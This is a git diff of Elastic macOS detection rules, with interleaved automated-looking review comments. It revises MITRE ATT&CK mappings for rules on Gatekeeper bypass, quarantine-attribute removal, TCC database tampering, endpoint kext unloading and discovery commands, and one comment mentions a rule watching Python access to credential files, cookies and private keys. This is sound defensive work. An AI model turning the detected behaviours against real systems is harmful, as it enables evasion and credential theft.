["host.id", "file.path"] diff --git a/rules/macos/defense_evasion_apple_softupdates_modification.toml b/rules/macos/defense_evasion_apple_softupdates_modification.toml index a69bb661f7e..744d460b16f 100644 --- a/rules/macos/defense_evasion_apple_softupdates_modification.toml +++ b/rules/macos/defense_evasion_apple_softupdates_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/15" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] 
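Review bot: `@@ -73,32 +73,10 @@` of credential_access_python_sensitive_file_access_first_occurrence.toml removes T1539, T1552.001 Credentials In Files and T1552.004 Private Keys and leaves only T1555.001 Keychain. The rule name and the `process.name:python*` context suggest the query still covers several classes of sensitive files, in which case the remaining single subtechnique under-describes the detection. The query body is outside this hunk, so confirm against it before narrowing the mapping, and keep the removed techniques if the file paths it matches still include cookie stores, credential files or private keys.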
@@ -99,13 +99,19 @@ In macOS environments, the SoftwareUpdate preferences manage system updates, cru [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/macos/defense_evasion_attempt_del_quarantine_attrib.toml b/rules/macos/defense_evasion_attempt_del_quarantine_attrib.toml index 6a0a3ddec4b..2a5331cde71 100644 --- a/rules/macos/defense_evasion_attempt_del_quarantine_attrib.toml +++ b/rules/macos/defense_evasion_attempt_del_quarantine_attrib.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/14" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -107,18 +107,19 @@ In macOS, files downloaded from the internet are tagged with a quarantine attrib [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1553" -name = "Subvert Trust Controls" -reference = "https://attack.mitre.org/techniques/T1553/" - +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" [[rule.threat.technique.subtechnique]] -id = "T1553.001" -name = "Gatekeeper Bypass" -reference = "https://attack.mitre.org/techniques/T1553/001/" +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/macos/defense_evasion_attempt_to_disable_gatekeeper.toml b/rules/macos/defense_evasion_attempt_to_disable_gatekeeper.toml index 83062f06243..d56533056a0 100644 
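Review bot: `@@ -107,18 +107,19 @@` of defense_evasion_attempt_del_quarantine_attrib.toml replaces T1553.001 Gatekeeper Bypass with T1562.001 Disable or Modify Tools, although removing the quarantine attribute is the behaviour ATT&CK files under Gatekeeper Bypass; the hunk on the next line for defense_evasion_attempt_to_disable_gatekeeper.toml likewise drops T1553.001 and keeps only the parent T1553, and defense_evasion_safari_config_change.toml swaps T1647 Plist File Modification for T1562.001. Coverage reports and navigator layers key on the precise subtechnique, so the generic T1562.001 loses signal in all three rules. Suggest restoring the original subtechnique in each and adding T1562.001 only where the rule actually observes a security control being disabled.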
--- a/rules/macos/defense_evasion_attempt_to_disable_gatekeeper.toml +++ b/rules/macos/defense_evasion_attempt_to_disable_gatekeeper.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/11" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -102,18 +102,14 @@ Gatekeeper is a macOS security feature that ensures only trusted software runs b [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1553" name = "Subvert Trust Controls" reference = "https://attack.mitre.org/techniques/T1553/" -[[rule.threat.technique.subtechnique]] -id = "T1553.001" -name = "Gatekeeper Bypass" -reference = "https://attack.mitre.org/techniques/T1553/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/macos/defense_evasion_gatekeeper_override_and_execution.toml b/rules/macos/defense_evasion_gatekeeper_override_and_execution.toml index 2ae593decbf..026222507de 100644 --- a/rules/macos/defense_evasion_gatekeeper_override_and_execution.toml +++ b/rules/macos/defense_evasion_gatekeeper_override_and_execution.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/03" [rule] author = ["Elastic"] 
@@ -76,17 +76,27 @@ configuration where host.os.type == "macos" and event.action == "gatekeeper_over [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1553" -name = "Subvert Trust Controls" -reference = "https://attack.mitre.org/techniques/T1553/" + [rule.threat.tactic] + name = "Defense Evasion" + id = "TA0005" + reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat.technique.subtechnique]] -id = "T1553.001" -name = "Gatekeeper Bypass" -reference = "https://attack.mitre.org/techniques/T1553/001/" + [[rule.threat.technique]] + name = "Impair Defenses" + id = "T1562" + reference = "https://attack.mitre.org/techniques/T1562/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat.technique.subtechnique]] + name = "Disable or Modify Tools" + id = "T1562.001" + reference = "https://attack.mitre.org/techniques/T1562/001/" + + [[rule.threat.technique]] + name = "Subvert Trust Controls" + id = "T1553" + reference = "https://attack.mitre.org/techniques/T1553/" + + [[rule.threat.technique.subtechnique]] + name = "Gatekeeper Bypass" + id = "T1553.001" + reference = "https://attack.mitre.org/techniques/T1553/001/" diff --git a/rules/macos/defense_evasion_modify_environment_launchctl.toml b/rules/macos/defense_evasion_modify_environment_launchctl.toml index b3b64c7f9f5..cc25b452be3 100644 --- a/rules/macos/defense_evasion_modify_environment_launchctl.toml +++ b/rules/macos/defense_evasion_modify_environment_launchctl.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/14" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] 
@@ -47,7 +47,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -95,26 +102,19 @@ Environment variables in macOS are crucial for configuring system and applicatio [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.007" +name = "Path Interception by PATH Environment Variable" +reference = "https://attack.mitre.org/techniques/T1574/007/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml b/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml index 45222ba8d1c..142f83f0d06 100644 --- a/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml +++ b/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml 
@@ -2,7 +2,7 @@
 creation_date = "2020/12/23"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/18"
 [rule]
 author = ["Elastic"]
@@ -49,7 +49,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: macOS",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -97,36 +104,19 @@ The Transparency, Consent, and Control (TCC) database in macOS manages app permi [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" - +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" [[rule.threat.technique.subtechnique]] -id = "T1548.006" -name = "TCC Manipulation" -reference = "https://attack.mitre.org/techniques/T1548/006/" +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" - -[[rule.threat.technique.subtechnique]] -id = "T1548.006" -name = "TCC Manipulation" -reference = "https://attack.mitre.org/techniques/T1548/006/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/macos/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.toml b/rules/macos/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.toml index 001273f0e01..edcdf2e9347 100644 --- a/rules/macos/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.toml +++ b/rules/macos/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/11" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/02" [rule] author = ["Elastic"] 
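Review bot: `@@ -97,36 +104,19 @@` of defense_evasion_privacy_controls_tcc_database_modification.toml drops T1548.006 TCC Manipulation (and the TA0004 Privilege Escalation `[[rule.threat]]` entry) in favour of T1562.001, and `@@ -97,31 +105,26 @@` of the sshd full-disk-access rule on the next line removes the same subtechnique. T1548.006 exists specifically for TCC database and privacy-preference tampering, so it is the more accurate mapping for both rules. Re-adding the `[[rule.threat.technique.subtechnique]]` block for T1548.006 under the existing T1548 entries needs no tag change in the sshd rule; if the TA0004 entry is restored in the TCC rule, `"Tactic: Privilege Escalation"` must return to its `tags` hunk as well.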
@@ -47,7 +47,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -97,31 +105,26 @@ Secure Copy Protocol (SCP) is used for secure file transfers over SSH. On macOS, [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1005" -name = "Data from Local System" -reference = "https://attack.mitre.org/techniques/T1005/" +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.006" -name = "TCC Manipulation" -reference = "https://attack.mitre.org/techniques/T1548/006/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + 
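Review bot: Both `[[rule.threat]]` entries in the second hunk now stop at `T1548` and drop the `T1548.006` (TCC Manipulation) sub-technique, although this is the privacy-preferences / full-disk-access rule where that sub-technique is the most specific fit. If the sub-technique is meant to stay, add the `[[rule.threat.technique.subtechnique]]` table with `id = "T1548.006"` under each entry. The tags (`Tactic: Privilege Escalation`, `Tactic: Defense Evasion`) match the two tactics, so a tag/tactic consistency check should pass for this rule as written.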
diff --git a/rules/macos/defense_evasion_safari_config_change.toml b/rules/macos/defense_evasion_safari_config_change.toml index e7344238f35..4a35cd07257 100644 --- a/rules/macos/defense_evasion_safari_config_change.toml +++ b/rules/macos/defense_evasion_safari_config_change.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/14" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/02" [rule] author = ["Elastic"] @@ -100,13 +100,19 @@ The 'defaults' command in macOS is a utility that allows users to read, write, a [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1647" -name = "Plist File Modification" -reference = "https://attack.mitre.org/techniques/T1647/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/macos/defense_evasion_sandboxed_office_app_suspicious_zip_file.toml b/rules/macos/defense_evasion_sandboxed_office_app_suspicious_zip_file.toml index 0108bed8fc5..308e0584ee7 100644 --- a/rules/macos/defense_evasion_sandboxed_office_app_suspicious_zip_file.toml +++ b/rules/macos/defense_evasion_sandboxed_office_app_suspicious_zip_file.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/11" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] 
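Review bot: The Safari hunk appears to introduce two consecutive empty added lines before `[rule.threat.tactic]` and a trailing empty line at end of file, where the old side used a single blank line between tables; the line breaks are collapsed in this view, so the exact count is inferred. The same spacing pattern recurs in the sandboxed_office_app, unload_endpointsecurity_kext, electron, installer_package, osascript, kerberos and remote_ssh hunks later in this chunk. If the rule loader writes rules back in a normalized form, this will show up as churn on the next save; running that normalization before committing would avoid it. Separately, `T1647` (Plist File Modification) was arguably the more specific technique for a `defaults`-driven Safari configuration change than `T1562.001`, so the swap deserves a sentence of rationale in the PR.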
@@ -101,13 +101,14 @@ Microsoft Office applications on macOS operate within a sandbox to limit potenti [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1211" -name = "Exploitation for Defense Evasion" -reference = "https://attack.mitre.org/techniques/T1211/" +id = "T1497" +name = "Virtualization/Sandbox Evasion" +reference = "https://attack.mitre.org/techniques/T1497/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/macos/defense_evasion_suspicious_tcc_access_granted.toml b/rules/macos/defense_evasion_suspicious_tcc_access_granted.toml index 8e521ac1de8..03d0581f379 100644 --- a/rules/macos/defense_evasion_suspicious_tcc_access_granted.toml +++ b/rules/macos/defense_evasion_suspicious_tcc_access_granted.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/03" [rule] author = ["Elastic"] @@ -18,7 +18,15 @@ name = "Suspicious TCC Access Granted for User Folders" risk_score = 73 rule_id = "ffd8b5e9-aa63-42b3-aead-6fdb170da9a3" severity = "high" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Collection", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" +] type = "esql" note = """## Triage and analysis 
@@ -77,48 +85,30 @@ FROM logs-endpoint.events.* [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1005" -name = "Data from Local System" -reference = "https://attack.mitre.org/techniques/T1005/" + [rule.threat.tactic] + name = "Defense Evasion" + id = "TA0005" + reference = "https://attack.mitre.org/tactics/TA0005/" -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" + [[rule.threat.technique]] + name = "Abuse Elevation Control Mechanism" + id = "T1548" + reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" - -[[rule.threat.technique.subtechnique]] -id = "T1548.006" -name = "TCC Manipulation" -reference = "https://attack.mitre.org/techniques/T1548/006/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat.technique.subtechnique]] + name = "TCC Manipulation" + id = "T1548.006" + reference = "https://attack.mitre.org/techniques/T1548/006/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" - -[[rule.threat.technique.subtechnique]] -id = "T1548.006" -name = "TCC Manipulation" -reference = "https://attack.mitre.org/techniques/T1548/006/" + [rule.threat.tactic] + name = "Collection" + id = "TA0009" + reference = "https://attack.mitre.org/tactics/TA0009/" -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat.technique]] + name = "Data from Local System" + id = "T1005" + reference = "https://attack.mitre.org/techniques/T1005/" 
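Review bot: The new threat block writes each table with `name` before `id` and indents the sub-tables under `[[rule.threat]]`, whereas the old side and the other rule files in this diff use the `id`, `name`, `reference` order at column 0; the tags list in the preceding hunk also omits the trailing comma the other files use. TOML is indifferent to both, so this is a style point, but it will surface as churn the next time the rule is written back in normalized form (assuming the loader normalizes, which this diff does not show). The tactic set (`Defense Evasion`, `Collection`) matches the two `Tactic:` tags, so tags and threat entries agree.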
diff --git a/rules/macos/defense_evasion_unload_endpointsecurity_kext.toml b/rules/macos/defense_evasion_unload_endpointsecurity_kext.toml index 4a94c88a37e..11135c5720e 100644 --- a/rules/macos/defense_evasion_unload_endpointsecurity_kext.toml +++ b/rules/macos/defense_evasion_unload_endpointsecurity_kext.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/02" [rule] author = ["Elastic"] @@ -93,18 +93,36 @@ Elastic Endpoint Security's kernel extension is crucial for monitoring and prote [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" +[[rule.threat.technique.subtechnique]] +id = "T1547.006" +name = "Kernel Modules and Extensions" +reference = "https://attack.mitre.org/techniques/T1547/006/" + + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/macos/discovery_full_disk_access_check.toml b/rules/macos/discovery_full_disk_access_check.toml index 02e5c37b70d..58b259b52dd 100644 --- a/rules/macos/discovery_full_disk_access_check.toml +++ b/rules/macos/discovery_full_disk_access_check.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] 
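Review bot: The second `[[rule.threat]]` entry in the kext hunk adds a Persistence tactic (`TA0003`, `T1547.006`), but no `tags` hunk for this file is in the diff, so `Tactic: Persistence` must already be present in the rule's tag list or a tag/tactic consistency test will report a missing tag. The same applies to `rules/macos/discovery_full_disk_access_check.toml` on the next line, which gains a Defense Evasion entry (`TA0005`, `T1548.006`) without a visible tags change. The tags of both files are outside the hunks, so this cannot be checked here; worth confirming before merging.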
@@ -72,12 +72,30 @@ file where host.os.type == "macos" and event.action == "open" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1083" -name = "File and Directory Discovery" -reference = "https://attack.mitre.org/techniques/T1083/" + [rule.threat.tactic] + name = "Discovery" + id = "TA0007" + reference = "https://attack.mitre.org/tactics/TA0007/" -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" + [[rule.threat.technique]] + name = "File and Directory Discovery" + id = "T1083" + reference = "https://attack.mitre.org/techniques/T1083/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + + [rule.threat.tactic] + name = "Defense Evasion" + id = "TA0005" + reference = "https://attack.mitre.org/tactics/TA0005/" + + [[rule.threat.technique]] + name = "Abuse Elevation Control Mechanism" + id = "T1548" + reference = "https://attack.mitre.org/techniques/T1548/" + + [[rule.threat.technique.subtechnique]] + name = "TCC Manipulation" + id = "T1548.006" + reference = "https://attack.mitre.org/techniques/T1548/006/" diff --git a/rules/macos/discovery_suspicious_sip_check.toml b/rules/macos/discovery_suspicious_sip_check.toml index e2fd4a9eab1..cf48e7fe8b7 100644 --- a/rules/macos/discovery_suspicious_sip_check.toml +++ b/rules/macos/discovery_suspicious_sip_check.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] 
@@ -74,30 +74,22 @@ process where host.os.type == "macos" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1497" -name = "Virtualization/Sandbox Evasion" -reference = "https://attack.mitre.org/techniques/T1497/" - -[[rule.threat.technique.subtechnique]] -id = "T1497.001" -name = "System Checks" -reference = "https://attack.mitre.org/techniques/T1497/001/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" + [rule.threat.tactic] + name = "Discovery" + id = "TA0007" + reference = "https://attack.mitre.org/tactics/TA0007/" + + [[rule.threat.technique]] + name = "System Information Discovery" + id = "T1082" + reference = "https://attack.mitre.org/techniques/T1082/" + + [[rule.threat.technique]] + name = "Virtualization/Sandbox Evasion" + id = "T1497" + reference = "https://attack.mitre.org/techniques/T1497/" + + [[rule.threat.technique.subtechnique]] + name = "System Checks" + id = "T1497.001" + reference = "https://attack.mitre.org/techniques/T1497/001/" diff --git a/rules/macos/discovery_system_and_network_configuration_check.toml b/rules/macos/discovery_system_and_network_configuration_check.toml index c19554c1387..05dfd0e7ded 100644 --- a/rules/macos/discovery_system_and_network_configuration_check.toml +++ b/rules/macos/discovery_system_and_network_configuration_check.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] 
@@ -71,12 +71,17 @@ file where host.os.type == "macos" and event.action == "open" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1016" -name = "System Network Configuration Discovery" -reference = "https://attack.mitre.org/techniques/T1016/" + [rule.threat.tactic] + name = "Discovery" + id = "TA0007" + reference = "https://attack.mitre.org/tactics/TA0007/" -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" + [[rule.threat.technique]] + name = "System Information Discovery" + id = "T1082" + reference = "https://attack.mitre.org/techniques/T1082/" + + [[rule.threat.technique]] + name = "System Network Configuration Discovery" + id = "T1016" + reference = "https://attack.mitre.org/techniques/T1016/" diff --git a/rules/macos/discovery_users_domain_built_in_commands.toml b/rules/macos/discovery_users_domain_built_in_commands.toml index 94be2280f1e..6720bc025b4 100644 --- a/rules/macos/discovery_users_domain_built_in_commands.toml +++ b/rules/macos/discovery_users_domain_built_in_commands.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/12" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] 
@@ -105,38 +105,29 @@ Built-in macOS commands like `ldapsearch`, `dsmemberutil`, and `dscl` are essent [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" - [[rule.threat.technique.subtechnique]] id = "T1069.001" name = "Local Groups" reference = "https://attack.mitre.org/techniques/T1069/001/" -[[rule.threat.technique.subtechnique]] -id = "T1069.002" -name = "Domain Groups" -reference = "https://attack.mitre.org/techniques/T1069/002/" [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" - [[rule.threat.technique.subtechnique]] id = "T1087.001" name = "Local Account" reference = "https://attack.mitre.org/techniques/T1087/001/" -[[rule.threat.technique.subtechnique]] -id = "T1087.002" -name = "Domain Account" -reference = "https://attack.mitre.org/techniques/T1087/002/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + diff --git a/rules/macos/execution_defense_evasion_electron_app_childproc_node_js.toml b/rules/macos/execution_defense_evasion_electron_app_childproc_node_js.toml index f61613a511a..6ec5857b809 100644 --- a/rules/macos/execution_defense_evasion_electron_app_childproc_node_js.toml +++ b/rules/macos/execution_defense_evasion_electron_app_childproc_node_js.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] 
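Review bot: The hunk removes the `T1069.002` (Domain Groups) and `T1087.002` (Domain Account) sub-techniques from a rule whose filename and context line (`ldapsearch`, `dsmemberutil`, `dscl`) describe domain as well as local account discovery, leaving only the `.001` local sub-techniques. If the rule still matches domain queries, keeping both `.002` sub-technique tables is the more accurate mapping; if it was narrowed to local lookups, the rule name and description should say so. The file path for this hunk is on the previous line.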
@@ -48,7 +48,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -95,18 +103,26 @@ Electron applications, built on Node.js, can execute child processes using the ` [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.007" -name = "JavaScript" -reference = "https://attack.mitre.org/techniques/T1059/007/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/macos/execution_initial_access_suspicious_browser_childproc.toml b/rules/macos/execution_initial_access_suspicious_browser_childproc.toml index 39cc78ca42e..3280689d092 100644 --- a/rules/macos/execution_initial_access_suspicious_browser_childproc.toml +++ b/rules/macos/execution_initial_access_suspicious_browser_childproc.toml 
